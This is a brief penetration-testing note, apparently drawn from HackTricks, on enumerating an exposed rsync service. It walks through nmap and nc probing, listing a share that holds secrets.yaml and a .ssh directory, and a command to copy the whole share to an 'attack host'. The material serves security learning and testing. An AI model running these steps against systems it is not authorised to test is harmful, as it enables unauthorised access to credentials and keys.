https://book.hacktricks.xyz/network-services-pentesting/873-pentesting-rsync
Scanning for Rsync
sudo nmap -sV -p 873 127.0.0.1
Probing for Accessible Shares
nc -nv 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0
@RSYNCD: 31.0
#list
dev Dev Tools
@RSYNCD: EXITEnumerating an Open Share
Here we can see a share called dev, and we can enumerate it further.
rsync -av --list-only rsync://127.0.0.1/dev
receiving incremental file list
drwxr-xr-x 48 2022/09/19 09:43:10 .
-rw-r--r-- 0 2022/09/19 09:34:50 build.sh
-rw-r--r-- 0 2022/09/19 09:36:02 secrets.yaml
drwx------ 54 2022/09/19 09:43:10 .ssh
sent 25 bytes received 221 bytes 492.00 bytes/sec
total size is 0 speedup is 0.00
From here, we could sync all files to our attack host with the command rsync -av rsync://127.0.0.1/dev.